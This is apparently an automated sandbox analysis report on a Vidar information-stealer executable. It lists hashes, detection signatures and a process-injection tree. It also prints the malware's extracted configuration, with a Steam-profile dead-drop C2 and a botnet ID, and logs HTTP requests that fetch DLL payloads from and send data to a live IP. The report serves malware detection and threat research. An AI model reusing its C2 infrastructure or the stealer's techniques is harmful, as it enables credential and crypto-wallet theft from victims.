Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1417473
MD5: 0ce3dc374e49433d7e15d02c015e0ee3
SHA1: 71882bb02d1fa7b4a0f824afdcc1cd53bdb85ba1
SHA256: f714adc256ed7b0d48a50c9b10d0db1d6285541801e720569c86fceeba072697
Tags: exe
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0CE3DC374E49433D7E15D02C015E0EE3)
    • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 7544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • WerFault.exe (PID: 7668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 932 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199658817715"], "Botnet": "90027e35f6cb548480a6fb8bd7cde0cf", "Version": "8.7"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 7472 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
Process Memory Space: RegAsm.exe PID: 7564 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.3ec5570.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.3ec5570.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
3.2.RegAsm.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
3.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

No Sigma rule has matched
No Snort rule has matched

                      AV Detection

                      Source: 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199658817715"], "Botnet": "90027e35f6cb548480a6fb8bd7cde0cf", "Version": "8.7"}
                      Source: file.exeVirustotal: Detection: 29%Perma Link
                      Source: file.exeJoe Sandbox ML: detected
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00406EB0 CryptUnprotectData,LocalAlloc,LocalFree,3_2_00406EB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409110 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcat,PK11_FreeSlot,lstrcat,3_2_00409110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004115E0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,3_2_004115E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00406E30 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_00406E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,3_2_6C6E6C80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8AA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,3_2_6C8AA9A0
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.112.44.153:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                      Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                      Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                      Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                      Source: Binary string: mscorlib.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: Friendly.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                      Source: Binary string: System.pdb4 source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.Core.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
                      Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr
                      Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                      Source: Binary string: c:\nconvxoz3\obj\Release\Friendly.pdb source: file.exe
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                      Source: Binary string: System.ni.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.Core.ni.pdb source: WERD260.tmp.dmp.6.dr
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,3_2_00401110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D200 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416310 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,3_2_00416310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004173B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_004173B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A410 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040A410
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_00416B50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040AF10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040AF10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A860 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040A860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416FA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,3_2_00416FA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416750 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,3_2_00416750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                      Networking

                      Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199658817715
                      Source: global trafficHTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 78.46.229.36 78.46.229.36
                      Source: Joe Sandbox ViewIP Address: 104.112.44.153 104.112.44.153
                      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 7117Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDBGHJKFIDHJJJEBKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 130713Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIECGCAEBFIIDHIDGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00404420 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_00404420
                      Source: global traffic HTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /sqlm.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
                      Source: unknown DNS traffic detected: queries for: steamcommunity.com
                      Source: unknown HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/news/
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/points/shop/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/stats/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://support.mozilla.org
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
